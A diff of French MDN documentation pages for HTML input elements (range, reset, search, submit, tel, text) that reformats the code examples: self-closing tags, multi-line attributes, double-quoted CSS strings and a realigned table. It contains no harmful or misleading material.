--- a/files/fr/web/html/element/input/range/index.md
+++ b/files/fr/web/html/element/input/range/index.md
@@ -61,8 +61,10 @@ Il n'existe pas de motif de validation. Cependant, voici les formes de validatio
 L'attribut [`value`](/fr/docs/Web/HTML/Element/Input#attr-value) contient une chaîne de caractères [`DOMString`](/fr/docs/Web/API/DOMString) qui correspond à la représentation textuelle du nombre sélectionnée. La valeur n'est jamais une chaîne vide (`""`). La valeur par défaut est celle médiane entre le minimum et le maximum (sauf si la valeur maximale indiquée est inférieure à la valeur minimale, auquel cas la valeur par défaut est celle de l'attribut `min`). Voici un fragment de code illustrant cet algorithme pour le choix de la valeur par défaut&nbsp;:
 
 ```js
-defaultValue = (rangeElem.max < rangeElem.min) ? rangeElem.min
-               : rangeElem.min + (rangeElem.max - rangeElem.min)/2;
+defaultValue =
+  rangeElem.max < rangeElem.min
+    ? rangeElem.min
+    : rangeElem.min + (rangeElem.max - rangeElem.min) / 2;
 ```
 
 Si on essaie d'obtenir une valeur inférieure au minimum, alors la valeur sera ramenée au minimum (de même si on essaye de dépasser le maximum).
@@ -129,7 +131,7 @@ Par défaut, le minimum vaut `0` et le maximum vaut `100`. Si ces bornes ne conv
 Par exemple, afin de demander à une utilisatrice ou un utilisateur de choisir une valeur approximative dans l'intervalle `[-10, 10]`, on pourra utiliser&nbsp;:
 
 ```html
-<input type="range" min="-10" max="10">
+<input type="range" min="-10" max="10" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -141,7 +143,7 @@ Par défaut, la granularité vaut `1`, ce qui signifie que la valeur est toujour
 #### Utiliser l'attribut `step`
 
 ```html
-<input type="range" min="5" max="10" step="0.01">
+<input type="range" min="5" max="10" step="0.01" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -151,7 +153,7 @@ Par défaut, la granularité vaut `1`, ce qui signifie que la valeur est toujour
 Si on souhaite prendre en charge n'importe quelle valeur, quel que soit le nombre de décimales, on pourra utiliser la valeur `any` pour l'attribut [`step`](/fr/docs/Web/HTML/Element/Input#attr-step)&nbsp;:
 
 ```html
-<input type="range" min="0" max="3.14" step="any">
+<input type="range" min="0" max="3.14" step="any" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -319,7 +321,7 @@ En attendant, il est possible de créer un contrôle vertical en utilisant les t
 Prenons ce contrôle&nbsp;:
 
 ```html
-<input type="range" id="volume" min="0" max="11" value="7" step="1">
+<input type="range" id="volume" min="0" max="11" value="7" step="1" />
 ```
 
 {{EmbedLiveSample("", 200, 200, "orientation_sample1.png")}}
@@ -338,7 +340,7 @@ Selon la spécification, pour afficher un tel contrôle verticalement, il suffit
 ```
 
 ```html
-<input type="range" id="volume" min="0" max="11" value="7" step="1">
+<input type="range" id="volume" min="0" max="11" value="7" step="1" />
 ```
 
 {{EmbedLiveSample("", 200, 200, "orientation_sample2.png")}}
@@ -353,7 +355,7 @@ Tout d'abord, on enveloppe l'élément [`<input>`](/fr/docs/Web/HTML/Element/Inp
 
 ```html
 <div class="slider-wrapper">
-  <input type="range" min="0" max="11" value="7" step="1">
+  <input type="range" min="0" max="11" value="7" step="1" />
 </div>
 ```
 
@@ -391,7 +393,7 @@ La propriété [`appearance`](/fr/docs/Web/CSS/appearance) possède une valeur n
 On utilise le même HTML que pour les exemples précédents&nbsp;:
 
 ```html
-<input type="range" min="0" max="11" value="7" step="1">
+<input type="range" min="0" max="11" value="7" step="1" />
 ```
 
 Ici, on cible uniquement les contrôles d'intervalles&nbsp;:
@@ -411,7 +413,7 @@ Firefox dispose d'un attribut HTML non-standard&nbsp;: `orient`.
 Le code HTML est semblable à celui utilisé précédemment, on y ajoute l'attribut avec une valeur `vertical`&nbsp;:
 
 ```html
-<input type="range" min="0" max="11" value="7" step="1" orient="vertical">
+<input type="range" min="0" max="11" value="7" step="1" orient="vertical" />
 ```
 
 {{EmbedLiveSample("", 200, 200)}}
@@ -423,7 +425,7 @@ La propriété [`writing-mode`](/fr/docs/Web/CSS/writing-mode) ne devrait pas ê
 Ici, on utilise le même HTML que précédemment&nbsp;:
 
 ```html
-<input type="range" min="0" max="11" value="7" step="1">
+<input type="range" min="0" max="11" value="7" step="1" />
 ```
 
 On cible uniquement les contrôles d'intervalle et on change leur mode d'écriture avec la valeur `bt-lr` qui signifie <i lang="en">bottom-to-top and left-to-right</i>, soit du bas vers le haut puis de la gauche vers la droite&nbsp;:
@@ -443,7 +445,7 @@ Comme chacun des exemples précédents fonctionne dans un navigateur différent,
 On garde l'attribut `orient` avec la valeur `vertical` pour Firefox&nbsp;:
 
 ```html
-<input type="range" min="0" max="11" value="7" step="1" orient="vertical">
+<input type="range" min="0" max="11" value="7" step="1" orient="vertical" />
 ```
 
 On cible les contrôles d'intervalle avec un mode d'écriture `bt-lr` pour Internet Explorer et on ajoute `-webkit-appearance: slider-vertical` pour les navigateurs basés sur WebKit&nbsp;:

--- a/files/fr/web/html/element/input/reset/index.md
+++ b/files/fr/web/html/element/input/reset/index.md
@@ -18,7 +18,7 @@ La valeur de l'attribut `value` d'un élément `<input type="reset">` contient u
 ### Exemple 1
 
 ```html
-<input type="reset" value="Réinitialiser le formulaire">
+<input type="reset" value="Réinitialiser le formulaire" />
 ```
 
 {{EmbedLiveSample("Exemple_1", 650, 30)}}
@@ -28,7 +28,7 @@ Si aucune valeur n'est indiquée, le bouton aura le texte par défaut « Réinit
 ### Exemple 2
 
 ```html
-<input type="reset">
+<input type="reset" />
 ```
 
 {{EmbedLiveSample("Exemple_2", 650, 30)}}
@@ -45,10 +45,10 @@ Commençons par créer un bouton de réinitialisation simple :
 <form>
   <div>
     <label for="example">Voici un champ</label>
-    <input id="example" type="text">
+    <input id="example" type="text" />
   </div>
   <div>
-    <input type="reset" value="Réinitialiser le formulaire">
+    <input type="reset" value="Réinitialiser le formulaire" />
   </div>
 </form>
 ```
@@ -69,11 +69,10 @@ Dans cet exemple, on utilise la touche <kbd>r</kbd> (il faudra donc appuyer sur 
 <form>
   <div>
     <label for="example">Saisir un peu de texte</label>
-    <input id="example" type="text">
+    <input id="example" type="text" />
   </div>
   <div>
-    <input type="reset" value="Réinitialiser le formulaire"
-     accesskey="r">
+    <input type="reset" value="Réinitialiser le formulaire" accesskey="r" />
   </div>
 </form>
 ```
@@ -87,7 +86,7 @@ Dans cet exemple, on utilise la touche <kbd>r</kbd> (il faudra donc appuyer sur 
 Pour désactiver un bouton de réinitialisation, il suffit d'appliquer l'attribut [`disabled`](/fr/docs/Web/HTML/Global_attributes#disabled) sur l'élément :
 
 ```html
-<input type="reset" value="Désactivé" disabled>
+<input type="reset" value="Désactivé" disabled />
 ```
 
 On peut activer/désactiver le bouton lors de la navigation sur la page avec JavaScript en modifiant la valeur de l'attribut `disabled` pour la passer de `true` à `false` et _vice versa_ (par exemple avec une instruction telle que `btn.disabled = true`).

--- a/files/fr/web/html/element/input/search/index.md
+++ b/files/fr/web/html/element/input/search/index.md
@@ -164,7 +164,7 @@ Les éléments `<input>` de type `search` sont semblables aux éléments `<input
 ```html
 <form>
   <div>
-    <input type="search" id="maRecherche" name="q">
+    <input type="search" id="maRecherche" name="q" />
     <button>Rechercher</button>
   </div>
 </form>
@@ -195,8 +195,11 @@ Il est possible de fournir un texte indicatif dans le champ de recherche afin de
 ```html
 <form>
   <div>
-    <input type="search" id="maRecherche" name="q"
-     placeholder="Rechercher sur le site…">
+    <input
+      type="search"
+      id="maRecherche"
+      name="q"
+      placeholder="Rechercher sur le site…" />
     <button>Rechercher</button>
   </div>
 </form>
@@ -220,9 +223,12 @@ Prenons un exemple&nbsp;:
 ```html
 <form role="search">
   <div>
-    <input type="search" id="maRecherche" name="q"
-     placeholder="Rechercher sur le site…"
-     aria-label="Rechercher parmi le contenu du site">
+    <input
+      type="search"
+      id="maRecherche"
+      name="q"
+      placeholder="Rechercher sur le site…"
+      aria-label="Rechercher parmi le contenu du site" />
     <button>Rechercher</button>
   </div>
 </form>
@@ -243,8 +249,12 @@ Il est possible de contrôler la taille physique du champ de saisie grâce à l'
 ```html
 <form>
   <div>
-    <input type="search" id="maRecherche" name="q"
-    placeholder="Rechercher sur le site…" size="30">
+    <input
+      type="search"
+      id="maRecherche"
+      name="q"
+      placeholder="Rechercher sur le site…"
+      size="30" />
     <button>Rechercher</button>
   </div>
 </form>
@@ -266,15 +276,15 @@ Les pseudo-classes CSS [`:valid`](/fr/docs/Web/CSS/:valid) et [`:invalid`](/fr/d
 
 ```css
 input:invalid ~ span:after {
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
   position: absolute;
 }
 
 input:valid ~ span:after {
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
-  position: absolute
+  position: absolute;
 }
 ```
 
@@ -287,8 +297,12 @@ Il est possible d'utiliser l'attribut [`required`](/fr/docs/Web/HTML/Element/Inp
 ```html
 <form>
   <div>
-    <input type="search" id="maRecherche" name="q"
-    placeholder="Recherche sur le site…" required>
+    <input
+      type="search"
+      id="maRecherche"
+      name="q"
+      placeholder="Recherche sur le site…"
+      required />
     <button>Rechercher</button>
     <span class="validity"></span>
   </div>
@@ -301,13 +315,13 @@ input {
 }
 
 input:invalid ~ span:after {
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
   position: absolute;
 }
 
 input:valid ~ span:after {
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   position: absolute;
 }
@@ -333,9 +347,15 @@ Dans l'exemple qui suit, la valeur saisie dans le champ de recherche doit mesure
 <form>
   <div>
     <label for="mySearch">Rechercher une utilisatrice ou un utilisateur</label>
-    <input type="search" id="mySearch" name="q"
-    placeholder="ID de 4 à 8 char." required
-    size="30" minlength="4" maxlength="8">
+    <input
+      type="search"
+      id="mySearch"
+      name="q"
+      placeholder="ID de 4 à 8 char."
+      required
+      size="30"
+      minlength="4"
+      maxlength="8" />
     <button>Rechercher</button>
     <span class="validity"></span>
   </div>
@@ -348,13 +368,13 @@ input {
 }
 
 input:invalid ~ span:after {
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
   position: absolute;
 }
 
 input:valid ~ span:after {
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   position: absolute;
 }
@@ -376,9 +396,14 @@ Prenons un exemple. Imaginons qu'on veuille rechercher un produit grâce à son 
 <form>
   <div>
     <label for="mySearch">Rechercher un produit par son code :</label>
-    <input type="search" id="mySearch" name="q"
-    placeholder="2 lettres puis 4 chiffres" required
-    size="30" pattern="[A-z]{2}[0-9]{4}">
+    <input
+      type="search"
+      id="mySearch"
+      name="q"
+      placeholder="2 lettres puis 4 chiffres"
+      required
+      size="30"
+      pattern="[A-z]{2}[0-9]{4}" />
     <button>Rechercher</button>
     <span class="validity"></span>
   </div>
@@ -391,13 +416,13 @@ input {
 }
 
 input:invalid ~ span:after {
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
   position: absolute;
 }
 
 input:valid ~ span:after {
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   position: absolute;
 }

--- a/files/fr/web/html/element/input/submit/index.md
+++ b/files/fr/web/html/element/input/submit/index.md
@@ -10,7 +10,7 @@ Les éléments {{HTMLElement("input")}} dont l'attribut `type` vaut **`"submit"`
 ## Exemple simple
 
 ```html
-<input type="submit" value="Envoyer le formulaire">
+<input type="submit" value="Envoyer le formulaire" />
 ```
 
 {{EmbedLiveSample("Exemple_simple", 650, 30)}}
@@ -24,7 +24,7 @@ Si on n'indique aucune valeur, ce sera un texte par défaut (dépendant du navig
 ### Exemple avec valeur par défaut
 
 ```html
-<input type="submit">
+<input type="submit" />
 ```
 
 {{EmbedLiveSample("Exemple_avec_valeur_par_défaut", 650, 30)}}
@@ -33,11 +33,11 @@ Si on n'indique aucune valeur, ce sera un texte par défaut (dépendant du navig
 
 En complément des attributs pris en charge par l'ensemble des éléments {{HTMLElement("input")}}, les boutons `"submit"` permettent d'utiliser les attributs suivants :
 
-| Attribut                               | Description                                                                                                                                                                                                               |
-| -------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| [`formaction`](#formaction)         | L'URL à laquelle envoyer les données du formulaire. Cette valeur prend le pas sur l'attribut [`action`](/fr/docs/Web/HTML/Element/form#action) du formulaire s'il est défini.                                                  |
-| [`formenctype`](#formenctype)     | Une chaîne de caractères qui indique le type d'encodage à utiliser pour les données du formulaire.                                                                                                                        |
-| [`formmethod`](#formmethod)         | La méthode HTTP ({{HTTPMethod("get")}} ou {{HTTPMethod("post")}}) à utiliser pour envoyer le formulaire.                                                                                                     |
+| Attribut                            | Description                                                                                                                                                                                                               |
+| ----------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
+| [`formaction`](#formaction)         | L'URL à laquelle envoyer les données du formulaire. Cette valeur prend le pas sur l'attribut [`action`](/fr/docs/Web/HTML/Element/form#action) du formulaire s'il est défini.                                             |
+| [`formenctype`](#formenctype)       | Une chaîne de caractères qui indique le type d'encodage à utiliser pour les données du formulaire.                                                                                                                        |
+| [`formmethod`](#formmethod)         | La méthode HTTP ({{HTTPMethod("get")}} ou {{HTTPMethod("post")}}) à utiliser pour envoyer le formulaire.                                                                                                                  |
 | [`formnovalidate`](#formnovalidate) | Un booléen qui, lorsqu'il est présent, indique que les champs du formulaire ne sont pas soumis [aux contraintes de validation](/fr/docs/Web/Guide/HTML/HTML5/Constraint_validation) avant l'envoi des données au serveur. |
 | [`formtarget`](#formtarget)         | Le contexte de navigation dans lequel charger la réponse du serveur reçue après l'envoi du formulaire.                                                                                                                    |
 
@@ -112,10 +112,10 @@ Commençons par un exemple simple :
 <form>
   <div>
     <label for="example">Veuillez saisir un texte</label>
-    <input id="example" type="text" name="text">
+    <input id="example" type="text" name="text" />
   </div>
   <div>
-    <input type="submit" value="Envoyer">
+    <input type="submit" value="Envoyer" />
   </div>
 </form>
 ```
@@ -138,11 +138,10 @@ Dans l'exemple qui suit, on définit <kbd>s</kbd> comme raccourci (autrement dit
 <form>
   <div>
     <label for="example">Veuillez saisir du texte</label>
-    <input id="example" type="text" name="text">
+    <input id="example" type="text" name="text" />
   </div>
   <div>
-    <input type="submit" value="Envoyer"
-     accesskey="s">
+    <input type="submit" value="Envoyer" accesskey="s" />
   </div>
 </form>
 ```
@@ -156,7 +155,7 @@ Dans l'exemple qui suit, on définit <kbd>s</kbd> comme raccourci (autrement dit
 Si on souhaite désactiver un bouton, il sufft d'utiliser l'attribut booléen universel [`disabled`](/fr/docs/Web/HTML/Global_attributes#disabled) :
 
 ```html
-<input type="submit" value="Disabled" disabled>
+<input type="submit" value="Disabled" disabled />
 ```
 
 Pour activer / désactiver le bouton dynamiquement, on pourra manipuler l'attribut DOM `disabled` avec la valeur `true` ou `false` en JavaScript (avec une instruction similaire à `btn.disabled = true`).

--- a/files/fr/web/html/element/input/tel/index.md
+++ b/files/fr/web/html/element/input/tel/index.md
@@ -148,7 +148,7 @@ Dans sa forme la plus simple, on peut implémenter un tel contrôle avec ce frag
 
 ```html
 <label for="telNo">Numéro de téléphone :</label>
-<input id="telNo" name="telNo" type="tel">
+<input id="telNo" name="telNo" type="tel" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -162,8 +162,7 @@ Il est parfois utile de fournir une indication quant au format attendu. Or, il e
 Dans l'exemple suivant, on a un contrôle `tel` avec un attribut `placeholder` qui vaut `01 23 45 67 89`. Vous pouvez manipuler le résultat obtenu pour voir comment ce texte est affiché selon qu'une valeur saisie ou que le champ est vide&nbsp;:
 
 ```html
-<input id="telNo" name="telNo" type="tel"
-       placeholder="01 23 45 67 89">
+<input id="telNo" name="telNo" type="tel" placeholder="01 23 45 67 89" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -177,8 +176,7 @@ On peut contrôler la taille physique allouée au contrôle ainsi que les longue
 La taille physique de la boîte de saisie peut être contrôlée avec l'attribut [`size`](/fr/docs/Web/HTML/Element/Input#attr-size). La valeur de cet attribut indique le nombre de caractères que la boîte peut afficher simultanément. Si, par exemple, on souhaite que le contrôle mesure 20 caractères de large, on pourra utiliser le code suivant&nbsp;:
 
 ```html
-<input id="telNo" name="telNo" type="tel"
-       size="20">
+<input id="telNo" name="telNo" type="tel" size="20" />
 ```
 
 {{EmbedLiveSample('', 600, 40)}}
@@ -190,8 +188,13 @@ L'attribut `size` ne contraint pas la taille de la valeur qui peut être saisie 
 Dans l'exemple qui suit, on crée un contrôle qui mesure 20 caractères de large et dont le contenu doit être plus long que 9 caractères et plus court que 14 caractères.
 
 ```html
-<input id="telNo" name="telNo" type="tel"
-       size="20" minlength="9" maxlength="14">
+<input
+  id="telNo"
+  name="telNo"
+  type="tel"
+  size="20"
+  minlength="9"
+  maxlength="14" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -205,8 +208,7 @@ Dans l'exemple qui suit, on crée un contrôle qui mesure 20 caractères de larg
 Il est possible de fournir une valeur par défaut en renseignant au préalable l'attribut [`value`](/fr/docs/Web/HTML/Element/Input#attr-value)&nbsp;:
 
 ```html
-<input id="telNo" name="telNo" type="tel"
-       value="01 23 45 67 89">
+<input id="telNo" name="telNo" type="tel" value="01 23 45 67 89" />
 ```
 
 {{EmbedLiveSample("", 600, 40)}}
@@ -216,13 +218,13 @@ Il est possible de fournir une valeur par défaut en renseignant au préalable l
 Si on souhaite aller plus loin, on peut fournir une liste de suggestions parmi lesquelles on pourra choisir (on pourra également saisir la valeur de son choix si celle-ci ne fait pas partie de la liste). Pour cela, on utilisera l'attribut [`list`](/fr/docs/Web/HTML/Element/Input#attr-list) dont la valeur est l'identifiant d'un élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) qui contient autant d'éléments [`<option>`](/fr/docs/Web/HTML/Element/Option) que de valeurs suggérées. C'est la valeur de l'attribut `value` de chaque élément `<option>` qui sera utilisée comme suggestion.
 
 ```html
-<input id="telNo" name="telNo" type="tel" list="defaultTels">
+<input id="telNo" name="telNo" type="tel" list="defaultTels" />
 
 <datalist id="defaultTels">
-  <option value="01 23 45 67 89">
-  <option value="02 45 67 89 01">
-  <option value="03 45 67 89 12">
-  <option value="04 56 87 98 32">
+  <option value="01 23 45 67 89"></option>
+  <option value="02 45 67 89 01"></option>
+  <option value="03 45 67 89 12"></option>
+  <option value="04 56 87 98 32"></option>
 </datalist>
 ```
 
@@ -243,8 +245,10 @@ Il est possible de rendre la saisie obligatoire avant de pouvoir envoyer le form
 ```html
 <form>
   <div>
-    <label for="telNo">Veuillez saisir un numéro de téléphone (obligatoire) : </label>
-    <input id="telNo" name="telNo" type="tel" required>
+    <label for="telNo"
+      >Veuillez saisir un numéro de téléphone (obligatoire) :
+    </label>
+    <input id="telNo" name="telNo" type="tel" required />
     <span class="validity"></span>
   </div>
   <div>
@@ -269,15 +273,16 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
-  position: absolute; content: '✖';
+input:invalid + span:after {
+  position: absolute;
+  content: "✖";
   padding-left: 5px;
   color: #8b0000;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   color: #009000;
 }
@@ -296,9 +301,16 @@ Dans cet exemple, on utilisera la même feuille de style que précédemment mais
 ```html
 <form>
   <div>
-    <label for="telNo">Veuillez saisir un numéro de téléphone (au format xx xx xx xx xx) :</label>
-    <input id="telNo" name="telNo" type="tel" required
-           pattern="[0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2}">
+    <label for="telNo"
+      >Veuillez saisir un numéro de téléphone (au format xx xx xx xx xx)
+      :</label
+    >
+    <input
+      id="telNo"
+      name="telNo"
+      type="tel"
+      required
+      pattern="[0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2} [0-9]{2}" />
     <span class="validity"></span>
   </div>
   <div>
@@ -321,15 +333,16 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
-  position: absolute; content: '✖';
+input:invalid + span:after {
+  position: absolute;
+  content: "✖";
   padding-left: 5px;
   color: #8b0000;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   color: #009000;
 }
@@ -356,23 +369,38 @@ Chaque boîte de saisie possède un attribut [`placeholder`](/fr/docs/Web/HTML/E
     </select>
   </div>
   <div>
-    <p>Veuillez saisir vos numéros de téléphone : </p>
+    <p>Veuillez saisir vos numéros de téléphone :</p>
     <span class="areaDiv">
-      <input id="areaNo" name="areaNo" type="tel" required
-             placeholder="Code régional" pattern="[0-9]{3}"
-             aria-label="Code régional">
+      <input
+        id="areaNo"
+        name="areaNo"
+        type="tel"
+        required
+        placeholder="Code régional"
+        pattern="[0-9]{3}"
+        aria-label="Code régional" />
       <span class="validity"></span>
     </span>
     <span class="number1Div">
-      <input id="number1" name="number1" type="tel" required
-             placeholder="Premier fragment" pattern="[0-9]{3}"
-             aria-label="Premier fragment du numéro">
+      <input
+        id="number1"
+        name="number1"
+        type="tel"
+        required
+        placeholder="Premier fragment"
+        pattern="[0-9]{3}"
+        aria-label="Premier fragment du numéro" />
       <span class="validity"></span>
     </span>
     <span class="number2Div">
-      <input id="number2" name="number2" type="tel" required
-             placeholder="Second fragment" pattern="[0-9]{4}"
-             aria-label="Second fragment du numéro">
+      <input
+        id="number2"
+        name="number2"
+        type="tel"
+        required
+        placeholder="Second fragment"
+        pattern="[0-9]{4}"
+        aria-label="Second fragment du numéro" />
       <span class="validity"></span>
     </span>
   </div>
@@ -388,12 +416,12 @@ Le code JavaScript associé est relativement simple, il contient un gestionnaire
 let selectElem = document.querySelector("select");
 let inputElems = document.querySelectorAll("input");
 
-selectElem.onchange = function() {
-  for(let i = 0; i < inputElems.length; i++) {
+selectElem.onchange = function () {
+  for (let i = 0; i < inputElems.length; i++) {
     inputElems[i].value = "";
   }
 
-  if(selectElem.value === "États-Unis") {
+  if (selectElem.value === "États-Unis") {
     inputElems[2].parentNode.style.display = "inline";
 
     inputElems[0].placeholder = "Code régional";
@@ -401,12 +429,12 @@ selectElem.onchange = function() {
 
     inputElems[1].placeholder = "Première partie";
     inputElems[1].pattern = "[0-9]{3}";
-    inputElems[1].setAttribute("aria-label","Première partie du numéro");
+    inputElems[1].setAttribute("aria-label", "Première partie du numéro");
 
     inputElems[2].placeholder = "Seconde partie";
     inputElems[2].pattern = "[0-9]{4}";
-    inputElems[2].setAttribute("aria-label","Seconde partie du numéro");
-  } else if(selectElem.value === "Royaume-Uni") {
+    inputElems[2].setAttribute("aria-label", "Seconde partie du numéro");
+  } else if (selectElem.value === "Royaume-Uni") {
     inputElems[2].parentNode.style.display = "none";
 
     inputElems[0].placeholder = "Code régional";
@@ -414,8 +442,8 @@ selectElem.onchange = function() {
 
     inputElems[1].placeholder = "Numéro local";
     inputElems[1].pattern = "[0-9]{4,8}";
-    inputElems[1].setAttribute("aria-label","Numéro local");
-  } else if(selectElem.value === "Allemagne") {
+    inputElems[1].setAttribute("aria-label", "Numéro local");
+  } else if (selectElem.value === "Allemagne") {
     inputElems[2].parentNode.style.display = "inline";
 
     inputElems[0].placeholder = "Code régional";
@@ -423,13 +451,13 @@ selectElem.onchange = function() {
 
     inputElems[1].placeholder = "Première partie";
     inputElems[1].pattern = "[0-9]{2,4}";
-    inputElems[1].setAttribute("aria-label","Première partie du numéro");
+    inputElems[1].setAttribute("aria-label", "Première partie du numéro");
 
     inputElems[2].placeholder = "Seconde partie";
     inputElems[2].pattern = "[0-9]{4}";
-    inputElems[2].setAttribute("aria-label","Seconde partie du numéro");
+    inputElems[2].setAttribute("aria-label", "Seconde partie du numéro");
   }
-}
+};
 ```
 
 Voici le résultat obtenu&nbsp;:
@@ -454,15 +482,16 @@ input + span {
   padding-right: 30px;
 }
 
-input:invalid+span:after {
-  position: absolute; content: '✖';
+input:invalid + span:after {
+  position: absolute;
+  content: "✖";
   padding-left: 5px;
   color: #8b0000;
 }
 
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
   color: #009000;
 }

--- a/files/fr/web/html/element/input/text/index.md
+++ b/files/fr/web/html/element/input/text/index.md
@@ -112,7 +112,7 @@ Un attribut booléen qui, lorsqu'il est présent, indique que le champ ne peut p
 
 L'attribut `size` est un nombre positif qui indique le nombre de caractères affichés à l'écran et qui définit donc la largeur du champ. La valeur par défaut de cet attribut est 20. Étant donné que la largeur des caractères peut varier cet attribut ne permet de définir une largeur exacte mais approximative — le champ affiché peut être plus étroit ou plus large que la taille (`size`) spécifiée en fonction des caractères saisis et des paramètres de police ([`font`](/fr/docs/Web/CSS/font)) utilisés.
 
-Cet attribut *ne* définit *pas* la limite du nombre de caractères saisissables dans le champ mais uniquement, et approximativement, le nombre de caractères qui peuvent être affichés à l'écran simultanément. Pour fixer une taille maximale sur la valeur du champ, on utilisera plutôt l'attribut [`maxlength`](#maxlength).
+Cet attribut _ne_ définit _pas_ la limite du nombre de caractères saisissables dans le champ mais uniquement, et approximativement, le nombre de caractères qui peuvent être affichés à l'écran simultanément. Pour fixer une taille maximale sur la valeur du champ, on utilisera plutôt l'attribut [`maxlength`](#maxlength).
 
 ### `spellcheck`
 
@@ -160,7 +160,7 @@ Les éléments `<input>` de type `text` sont utilisés pour créer des champs te
 <form>
   <div>
     <label for="uname">Veuillez choisir un nom d'utilisateur : </label>
-    <input type="text" id="uname" name="name">
+    <input type="text" id="uname" name="name" />
   </div>
   <div>
     <button>Envoyer</button>
@@ -182,8 +182,11 @@ Il est possible de fournir un texte indicatif qui sera affiché dans le champ lo
 <form>
   <div>
     <label for="uname">Veuillez choisir un nom d'utilisateur :</label>
-    <input type="text" id="uname" name="name"
-           placeholder="Un seul mot, en minuscules">
+    <input
+      type="text"
+      id="uname"
+      name="name"
+      placeholder="Un seul mot, en minuscules" />
   </div>
   <div>
     <button>Envoyer</button>
@@ -205,9 +208,12 @@ La taille physique du champ de saisie peut être adaptée grâce à l'attribut [
 <form>
   <div>
     <label for="uname">Veuillez choisir un nom d'utilisateur : </label>
-    <input type="text" id="uname" name="name"
-           placeholder="Un seul mot, en minuscules"
-           size="30">
+    <input
+      type="text"
+      id="uname"
+      name="name"
+      placeholder="Un seul mot, en minuscules"
+      size="30" />
   </div>
   <div>
     <button>Envoyer</button>
@@ -221,7 +227,7 @@ La taille physique du champ de saisie peut être adaptée grâce à l'attribut [
 
 Les éléments `<input>` de type `text` ne possède pas de mécanisme de validation automatique. En revanche, il est possible d'ajouter certaines contraintes qui seront vérifiées côté client et que nous allons voir ici.
 
-> **Note :** La validation des données de formulaire HTML *ne doit pas* remplacer des scripts de vérification côté serveur. En effet, il est très facile à modifier le code HTML du site pour outrepasser ou même désactiver les mécanismes de validation. Il est également possible d'envoyer des données directement au serveur sans passer par le formulaire. Si votre serveur ne valide pas les données reçues, des données potentiellement mal formatées (ou trop abondantes, du mauvais type et ainsi de suite) pourraient causer des dommages à votre base de données.
+> **Note :** La validation des données de formulaire HTML _ne doit pas_ remplacer des scripts de vérification côté serveur. En effet, il est très facile à modifier le code HTML du site pour outrepasser ou même désactiver les mécanismes de validation. Il est également possible d'envoyer des données directement au serveur sans passer par le formulaire. Si votre serveur ne valide pas les données reçues, des données potentiellement mal formatées (ou trop abondantes, du mauvais type et ainsi de suite) pourraient causer des dommages à votre base de données.
 
 ### Un aparté sur la mise en forme
 
@@ -239,13 +245,13 @@ input + span {
 
 input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
 
 input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -260,7 +266,7 @@ On peut utiliser l'attribut [`required`](/fr/docs/Web/HTML/Element/Input#attr-re
 <form>
   <div>
     <label for="uname">Veuillez choisir un nom d'utilisateur : </label>
-    <input type="text" id="uname" name="name" required>
+    <input type="text" id="uname" name="name" required />
     <span class="validity"></span>
   </div>
   <div>
@@ -270,21 +276,21 @@ On peut utiliser l'attribut [`required`](/fr/docs/Web/HTML/Element/Input#attr-re
 ```
 
 ```css hidden
-div { 
+div {
   margin-bottom: 10px;
   position: relative;
-} 
-input + span { 
+}
+input + span {
   padding-right: 30px;
-} 
-input:invalid+span:after { 
+}
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -305,9 +311,15 @@ Dans l'exemple suivant, pour que le texte soit valide, il faut qu'il soit plus l
 <form>
   <div>
     <label for="uname">Choisir un nom d'utilisateur : </label>
-    <input type="text" id="uname" name="name" required size="45"
-           placeholder="Le nom d'utilisateur doit mesurer entre 4 et 8 caractères"
-           minlength="4" maxlength="8">
+    <input
+      type="text"
+      id="uname"
+      name="name"
+      required
+      size="45"
+      placeholder="Le nom d'utilisateur doit mesurer entre 4 et 8 caractères"
+      minlength="4"
+      maxlength="8" />
     <span class="validity"></span>
   </div>
   <div>
@@ -324,14 +336,14 @@ div {
 input + span {
   padding-right: 30px;
 }
-input:invalid+span:after {
+input:invalid + span:after {
   position: absolute;
-  content: '✖';
+  content: "✖";
   padding-left: 5px;
 }
-input:valid+span:after {
+input:valid + span:after {
   position: absolute;
-  content: '✓';
+  content: "✓";
   padding-left: 5px;
 }
 ```
@@ -354,8 +366,13 @@ Dans l'exemple qui suit, on restreint le format du texte afin que ce soit un tex
 <form>
   <div>
     <label for="uname">Veuillez choisir un nom d'utilisateur : </label>
-    <input type="text" id="uname" name="name" required size="45"
-           pattern="[a-z]{4,8}">
+    <input
+      type="text"
+      id="uname"
+      name="name"
+      required
+      size="45"
